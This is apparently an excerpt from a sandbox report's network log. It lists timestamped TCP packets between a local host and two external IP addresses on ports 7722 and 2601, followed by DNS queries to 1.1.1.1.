Jan 7, 2025 01:28:27.686645031 CET	52466	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:27.691359043 CET	7722	52466	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:27.731683969 CET	7722	52466	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:28.059456110 CET	7722	52466	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:28.059514046 CET	52466	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:28.206357002 CET	52468	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:28.215209007 CET	7722	52468	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:28.215260029 CET	52468	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:28.217077017 CET	52468	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:28.217150927 CET	52468	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:28.225790977 CET	7722	52468	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:28.266345978 CET	7722	52468	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:28.577620029 CET	7722	52468	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:28.577702999 CET	52468	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.700381994 CET	52470	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.704612970 CET	52472	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.705328941 CET	7722	52470	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:32.705385923 CET	52470	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.706635952 CET	52470	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.706757069 CET	52470	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.709531069 CET	7722	52472	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:32.709580898 CET	52472	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.711467028 CET	7722	52470	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:32.718913078 CET	52472	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.718982935 CET	52472	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:32.723808050 CET	7722	52472	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:32.751785994 CET	7722	52470	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:32.767729998 CET	7722	52472	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:33.076977015 CET	7722	52470	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:33.077038050 CET	52470	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:33.093662977 CET	7722	52472	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:33.093717098 CET	52472	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.700642109 CET	52474	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.705516100 CET	7722	52474	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:37.705588102 CET	52474	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.705986977 CET	52474	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.706058025 CET	52474	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.710774899 CET	7722	52474	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:37.751837015 CET	7722	52474	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:37.782357931 CET	52476	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.787355900 CET	7722	52476	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:37.787424088 CET	52476	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.794126034 CET	52476	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.794286966 CET	52476	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:37.799617052 CET	7722	52476	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:37.844477892 CET	7722	52476	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:38.093689919 CET	7722	52474	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:38.093769073 CET	52474	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:38.158920050 CET	7722	52476	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:38.159008980 CET	52476	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.225774050 CET	52478	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.230586052 CET	7722	52478	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:43.230642080 CET	52478	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.231666088 CET	52478	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.232104063 CET	52478	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.236471891 CET	7722	52478	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:43.245438099 CET	52480	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.250283957 CET	7722	52480	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:43.250360012 CET	52480	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.266397953 CET	52480	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.266499043 CET	52480	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.271204948 CET	7722	52480	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:43.283756971 CET	7722	52478	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:43.311682940 CET	7722	52480	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:43.603209972 CET	7722	52478	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:43.603271008 CET	52478	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:43.627504110 CET	7722	52480	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:43.627687931 CET	52480	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:49.469346046 CET	50426	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:49.474245071 CET	2601	50426	104.168.33.8	192.168.2.13
Jan 7, 2025 01:28:49.474332094 CET	50426	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:49.474812031 CET	50426	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:49.479661942 CET	2601	50426	104.168.33.8	192.168.2.13
Jan 7, 2025 01:28:49.479707003 CET	50426	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:49.484451056 CET	2601	50426	104.168.33.8	192.168.2.13
Jan 7, 2025 01:28:49.981924057 CET	2601	50426	104.168.33.8	192.168.2.13
Jan 7, 2025 01:28:49.981976986 CET	50426	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:49.982008934 CET	50426	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:52.492634058 CET	52484	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.498557091 CET	7722	52484	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:52.498635054 CET	52484	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.501612902 CET	52484	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.502110004 CET	52484	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.506407022 CET	7722	52484	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:52.535331964 CET	52486	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.540946960 CET	7722	52486	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:52.540997982 CET	52486	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.551681995 CET	7722	52484	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:52.565915108 CET	52486	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.566024065 CET	52486	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.570669889 CET	7722	52486	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:52.611712933 CET	7722	52486	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:52.864129066 CET	7722	52484	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:52.864208937 CET	52484	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:52.905472994 CET	7722	52486	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:52.905534029 CET	52486	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.239267111 CET	52488	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.244158983 CET	7722	52488	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:58.244204044 CET	52488	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.244666100 CET	52490	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.247006893 CET	52488	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.247103930 CET	52488	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.249407053 CET	7722	52490	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:58.249453068 CET	52490	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.251780033 CET	7722	52488	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:58.264951944 CET	52490	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.265074015 CET	52490	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.269840002 CET	7722	52490	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:58.299742937 CET	7722	52488	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:58.311719894 CET	7722	52490	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:58.614181995 CET	7722	52490	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:58.614239931 CET	52490	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:58.631808996 CET	7722	52488	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:58.631872892 CET	52488	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.492578983 CET	52492	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.497476101 CET	7722	52492	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:07.497528076 CET	52492	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.499514103 CET	52492	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.499617100 CET	52492	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.499818087 CET	52494	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.504367113 CET	7722	52492	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:07.504631996 CET	7722	52494	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:07.504693031 CET	52494	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.522295952 CET	52494	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.522397995 CET	52494	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.527137995 CET	7722	52494	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:07.547740936 CET	7722	52492	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:07.567789078 CET	7722	52494	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:07.861978054 CET	7722	52492	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:07.862060070 CET	52492	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:07.892159939 CET	7722	52494	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:07.892236948 CET	52494	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.505604029 CET	52496	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.510508060 CET	7722	52496	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:12.510556936 CET	52496	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.510710955 CET	52498	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.511706114 CET	52496	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.511800051 CET	52496	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.515449047 CET	7722	52498	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:12.516495943 CET	7722	52496	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:12.520060062 CET	52498	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.531163931 CET	52498	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.531235933 CET	52498	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.536005974 CET	7722	52498	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:12.563702106 CET	7722	52496	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:12.579679012 CET	7722	52498	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:12.915002108 CET	7722	52496	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:12.915061951 CET	52496	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:12.928116083 CET	7722	52498	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:12.928160906 CET	52498	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:16.057555914 CET	50444	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:16.062366962 CET	2601	50444	104.168.33.8	192.168.2.13
Jan 7, 2025 01:29:16.062444925 CET	50444	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:16.063354969 CET	50444	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:16.068197966 CET	2601	50444	104.168.33.8	192.168.2.13
Jan 7, 2025 01:29:16.068247080 CET	50444	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:16.073016882 CET	2601	50444	104.168.33.8	192.168.2.13
Jan 7, 2025 01:29:16.599417925 CET	2601	50444	104.168.33.8	192.168.2.13
Jan 7, 2025 01:29:16.599494934 CET	50444	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:16.599579096 CET	50444	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:22.501633883 CET	52502	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.503164053 CET	52504	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.506536007 CET	7722	52502	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:22.506586075 CET	52502	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.507283926 CET	52502	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.507356882 CET	52502	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.507966995 CET	7722	52504	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:22.508013010 CET	52504	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.512026072 CET	7722	52502	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:22.520330906 CET	52504	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.520507097 CET	52504	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.525155067 CET	7722	52504	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:22.559737921 CET	7722	52502	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:22.571717978 CET	7722	52504	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:22.871471882 CET	7722	52504	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:22.871572971 CET	52504	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:22.874814987 CET	7722	52502	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:22.874862909 CET	52502	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.251368046 CET	52506	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.256050110 CET	52508	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.256969929 CET	7722	52506	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.257036924 CET	52506	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.260922909 CET	7722	52508	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.260993004 CET	52508	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.261332989 CET	52506	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.261444092 CET	52506	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.263006926 CET	52508	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.263580084 CET	52508	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.266123056 CET	7722	52506	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.267752886 CET	7722	52508	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.273781061 CET	52510	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.278594971 CET	7722	52510	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.278637886 CET	52510	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.307691097 CET	7722	52506	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.311705112 CET	7722	52508	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.398883104 CET	52510	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.399010897 CET	52510	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.403748989 CET	7722	52510	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.451698065 CET	7722	52510	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.637547970 CET	7722	52506	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.637604952 CET	52506	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.642577887 CET	7722	52510	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.642628908 CET	52510	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:28.644433975 CET	7722	52508	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:28.644491911 CET	52508	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:37.505609989 CET	52512	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:37.510523081 CET	7722	52512	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:37.510585070 CET	52512	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:37.511034966 CET	52512	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:37.511126995 CET	52512	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:37.515779972 CET	7722	52512	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:37.559725046 CET	7722	52512	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:37.876580954 CET	7722	52512	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:37.876655102 CET	52512	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:42.675142050 CET	50458	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:42.680044889 CET	2601	50458	104.168.33.8	192.168.2.13
Jan 7, 2025 01:29:42.680118084 CET	50458	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:42.680746078 CET	50458	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:42.685544014 CET	2601	50458	104.168.33.8	192.168.2.13
Jan 7, 2025 01:29:42.685610056 CET	50458	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:42.690412045 CET	2601	50458	104.168.33.8	192.168.2.13
Jan 7, 2025 01:29:43.230756044 CET	2601	50458	104.168.33.8	192.168.2.13
Jan 7, 2025 01:29:43.230809927 CET	50458	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:43.230958939 CET	50458	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:29:43.256114006 CET	52516	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.260984898 CET	7722	52516	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.261039972 CET	52516	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.262917042 CET	52516	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.262996912 CET	52516	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.267690897 CET	7722	52516	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.283410072 CET	52518	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.288286924 CET	7722	52518	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.288337946 CET	52518	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.311686993 CET	7722	52516	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.319981098 CET	52520	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.324774027 CET	7722	52520	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.324826002 CET	52520	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.335252047 CET	52518	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.335464001 CET	52518	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.340095997 CET	7722	52518	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.349242926 CET	52520	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.349419117 CET	52520	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.354006052 CET	7722	52520	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.383677959 CET	7722	52518	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.399724960 CET	7722	52520	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.641184092 CET	7722	52516	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.641350031 CET	52516	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.672045946 CET	7722	52518	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.672101974 CET	52518	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:43.701021910 CET	7722	52520	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:43.701257944 CET	52520	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.505038977 CET	52522	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.509931087 CET	7722	52522	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.509989023 CET	52522	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.514748096 CET	52522	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.514941931 CET	52522	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.518512964 CET	52524	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.519633055 CET	7722	52522	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.523360968 CET	7722	52524	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.523415089 CET	52524	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.524070978 CET	52524	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.524152994 CET	52524	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.527817011 CET	52526	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.528893948 CET	7722	52524	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.532661915 CET	7722	52526	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.533107042 CET	52526	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.535588026 CET	52526	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.535851002 CET	52526	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.540431976 CET	7722	52526	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.567704916 CET	7722	52522	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.571754932 CET	7722	52524	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.583734989 CET	7722	52526	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.879718065 CET	7722	52522	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.879781008 CET	52522	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.909954071 CET	7722	52524	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.910039902 CET	52524	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:52.929708958 CET	7722	52526	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:52.929794073 CET	52526	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.278264999 CET	52528	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.283163071 CET	7722	52528	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:58.283216953 CET	52528	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.284970045 CET	52528	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.285167933 CET	52528	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.289710045 CET	7722	52528	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:58.296560049 CET	52530	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.301312923 CET	7722	52530	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:58.301361084 CET	52530	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.303150892 CET	52530	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.303294897 CET	52530	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.307960033 CET	7722	52530	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:58.331734896 CET	7722	52528	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:58.351705074 CET	7722	52530	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:58.658576012 CET	7722	52528	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:58.658655882 CET	52528	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:29:58.666403055 CET	7722	52530	107.175.130.16	192.168.2.13
Jan 7, 2025 01:29:58.666471004 CET	52530	7722	192.168.2.13	107.175.130.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 01:27:56.028634071 CET	47827	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:56.035677910 CET	53	47827	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:56.039400101 CET	33353	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:56.047415018 CET	53	33353	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:56.050663948 CET	45394	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:56.059755087 CET	53	45394	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:56.062861919 CET	46247	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:56.069763899 CET	53	46247	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:56.072755098 CET	54013	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:56.086808920 CET	53	54013	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:56.089766979 CET	41646	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:56.098995924 CET	53	41646	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:57.670093060 CET	55112	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:57.677966118 CET	53	55112	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:57.681900978 CET	49203	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:57.701088905 CET	53	49203	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:57.705338001 CET	44274	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:57.719511032 CET	53	44274	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:57.724271059 CET	45993	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:57.738755941 CET	53	45993	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:57.742723942 CET	57511	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:27:57.757059097 CET	53	57511	1.1.1.1	192.168.2.13
Jan 7, 2025 01:27:57.760874033 CET	41034	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:02.773195028 CET	44843	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:07.796875954 CET	39160	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:12.816653967 CET	59188	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:17.822242022 CET	58375	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:24.397305965 CET	46243	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:24.404450893 CET	53	46243	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:24.405100107 CET	37888	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:24.424210072 CET	53	37888	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:24.424920082 CET	48313	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:24.433070898 CET	53	48313	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:24.433701992 CET	33704	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:24.441091061 CET	53	33704	1.1.1.1	192.168.2.13
Jan 7, 2025 01:28:24.441704988 CET	58777	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:28:24.451229095 CET	53	58777	1.1.1.1	192.168.2.13
